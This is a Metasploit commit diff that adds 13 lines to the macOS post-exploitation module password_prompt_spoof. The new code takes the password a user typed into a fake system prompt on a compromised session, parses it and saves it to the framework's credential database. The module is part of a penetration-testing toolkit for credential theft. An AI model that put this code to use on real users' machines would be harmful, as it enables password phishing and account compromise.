Land #11737, store password from osx/gather/password_prompt_spoof

4.x
Brent Cook 2019-04-24 05:06:20 -05:00 committed by Metasploit
parent 8501a9beae
commit 59971c3ba3
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
1 changed files with 13 additions and 0 deletions

View File

@ -106,6 +106,19 @@ class MetasploitModule < Msf::Post
print_good("password file contents: #{password_data}")
passf = store_loot("password", "text/plain", session, password_data, "passwd.pwd", "OSX Password")
print_good("Password data stored as loot in: #{passf}")
pwd = password_data.split(':', 3)
pwd.shift() # date
pwd.shift() # username
create_credential({
workspace_id: myworkspace_id,
post_reference_name: self.refname,
private_data: pwd,
origin_type: :session,
session_id: session_db_id,
private_type: :password,
username: username
}
)
else
print_status("Timeout period expired before credentials were entered!")
end